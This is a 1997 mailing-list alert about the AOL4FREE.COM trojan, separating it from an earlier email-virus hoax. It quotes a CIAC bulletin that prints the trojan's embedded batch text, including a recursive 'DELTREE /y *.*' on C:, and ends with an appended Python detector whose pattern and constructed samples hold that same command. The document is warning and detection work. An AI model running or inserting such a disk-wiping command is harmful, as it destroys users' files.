From: atomic@netcom.com (Mike Metlay ++ Atomic City)
Message-Id: <199704181835.LAA25396@netcom23.netcom.com>
Subject: TROJAN HORSE ALERT!
To: emusic-l@american.edu (EMUSIC-L), synth-l@american.edu (SYNTH-L),
analogue@hyperreal.com (Analogue Heaven Mailing List),
electronica@noether.ex.ac.uk (Electronica List)
Date: Fri, 18 Apr 1997 11:35:21 -0700 (PDT)
Reply-To: atomic@netcom.com

Hi, everyone. Most of you probably have heard me take a strong stance
against redistributing rumors about "email viruses" and other unproven
nastinesses waiting to scare people, if not actually harm their
computers. So when *I* blow the whistle, I hope it'll be taken seriously.

I have received the following email from my older brother, who does
virus-watch for part of the University of Rochester's medical school
(among other things), and have checked out the Web site in question
myself. This one's legit, newly discovered, and warnings should be
sent far and wide, as long as all of them cite the Website URL where
information updates can be obtained. In other words, "Good Times" be
hanged, this one ain't no hoax.

*** begin quote ***
From lmetlay@acu.pathology.rochester.edu Fri Apr 18 10:34:46 1997
>
>Friends-
>
>Once upon a time there was a hacker who wrote a Macintosh program called
>AOL4FREE which allowed users to avoid AOL connect-time charges.
>
>Then someone started an email hoax claiming that there was an "email virus"
>that would erase your hard disk if you read the message. This is really a
>hoax.
>
>But, life imitates art...
>
>The CIAC announced on 4/17 that they have gotten a DOS/Windows program
>called AOL4FREE.COM that will erase the user's hard disk. It has to be
>executed in order to do any damage. Reading an email will not cause harm
>but if the program is received as an email attachment, opening the
>attachment will cause the Trojan horse to execute. Those of you who are
>DOS/Windows users, please be careful.
>
>For more information check out the CIAC alert:
>http://ciac.llnl.gov/ciac/bulletins/h-47a.shtml
>
>Leon
>
>--
>Leon A. Metlay, M.D., Associate Professor of Pathology and Laboratory Medicine
>University of Rochester Medical Center Phone: (716) 275-5691
>P.O. Box 626 Fax: (716) 273-1027
>Rochester, NY 14642 lmetlay@acu.pathology.rochester.edu
>http://www.urmc.rochester.edu/smd/pathres/URPLM.html
>"Flame a newbie for passing along a hoax, and you add to the spam. Teach a
>newbie to investigate a virus warning and you increase the peace."- me
>Check out: http://ciac.llnl.gov/ciac/CIACVirusDatabase.html
*** end quote ***
From the CIAC's Website, I cut and pasted in only a brief part of the
extensive warning message and background data on this little ratbag.
It reads:
***
AOL4FREE.COM is a Trojan program that is 993 bytes (2 sectors) long.
The following text is readable in the AOL4FREE.COM file
if you display it with the DOS TYPE command or the DOS EDIT program.

    Compiled by BAT2EXEC 1.5
    PC Magazine . Douglas Boling

Note that this text may appear in any program compiled with the BAT2EXEC
program and has nothing to do with the Trojan Horse.

If you open the AOL4FREE.COM file with a disk editor or with the Windows
Notepad program, the following text is found at the end of the second sector
of the file.

    PATH
    COMMANDC earc
    /C C:
    /C CD\
    DELTREE /y *.*
    ECHO YOUR COMPUTER HAS JUST BEEN F***ED BY *VP* F*** YOU AOL-LAMER

Where F*** is a common vulgar expletive.
***

The message goes on to say that AOL4FREE.COM can not do any damage
unless you run it, but as noted above, opening an email attachment is
equivalent to running it. If you run it accidentally and immediately
press Control-C, some of your files MAY be saved, but if you wait long
enough to see the message, your C: drive will be shot to hell.

That's a very basic distillation of the whole story, which gets more
confusing because of the existence of the "AOL4FREE" hoax. Please read
the Web page for more data if you have any confusion at all about this.

mike

--
Mike Metlay - ATOMIC CITY - P. O. Box 81175, Pittsburgh, PA 15217-0675 USA
= atomic@netcom.com -- http://pd.net/atomic-city -- 800.924.ATOM =
CD orders via LOFTY PURSUITS: 800.548.6724 & 904.385.6463, FAX 904.668.5825
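
Added example, not part of the original message or the CIAC bulletin: a Python triage check built only from the traits quoted above (the 993-byte size, the BAT2EXEC banner, and the DELTREE line near the end of the file). It treats the banner alone as a non-indicator, as the quoted text says it appears in any BAT2EXEC output. The function names and the sample bytes are constructed for illustration and are not the real file.

```python
import re

# Traits taken from the text quoted in the alert above.
BANNER = b"Compiled by BAT2EXEC"      # appears in ANY BAT2EXEC-compiled program
DESTRUCTIVE = re.compile(rb"DELTREE\s+/y\s+\*\.\*", re.IGNORECASE)
REPORTED_SIZE = 993                   # bytes, as stated in the quoted text


def triage(data: bytes) -> dict:
    """Classify a file's bytes using only the traits quoted in the alert."""
    has_banner = BANNER in data
    hit = DESTRUCTIVE.search(data)
    if hit:
        verdict = "destructive-batch"  # recursive-delete text is present
    elif has_banner:
        verdict = "bat2exec-only"      # compiler banner alone is not an indicator
    else:
        verdict = "no-match"
    return {
        "verdict": verdict,
        "has_banner": has_banner,
        "payload_offset": hit.start() if hit else None,
        "size_matches_report": len(data) == REPORTED_SIZE,
    }


def constructed_sample(tail: bytes, size: int = REPORTED_SIZE) -> bytes:
    """Constructed stand-in: banner, zero padding, then text at the end."""
    head = BANNER + b" 1.5\r\n"
    return head + b"\x00" * (size - len(head) - len(tail)) + tail


# Constructed inputs: one carrying the quoted command text, one harmless.
SUSPECT = constructed_sample(b"/C C:\x00/C CD\\\x00DELTREE /y *.*\x00")
HARMLESS = constructed_sample(b"ECHO HELLO\x00")

if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT), ("harmless", HARMLESS)):
        print(name, triage(blob))
```

A size match on its own says nothing; it is reported separately so an analyst can see how closely a flagged file matches the description.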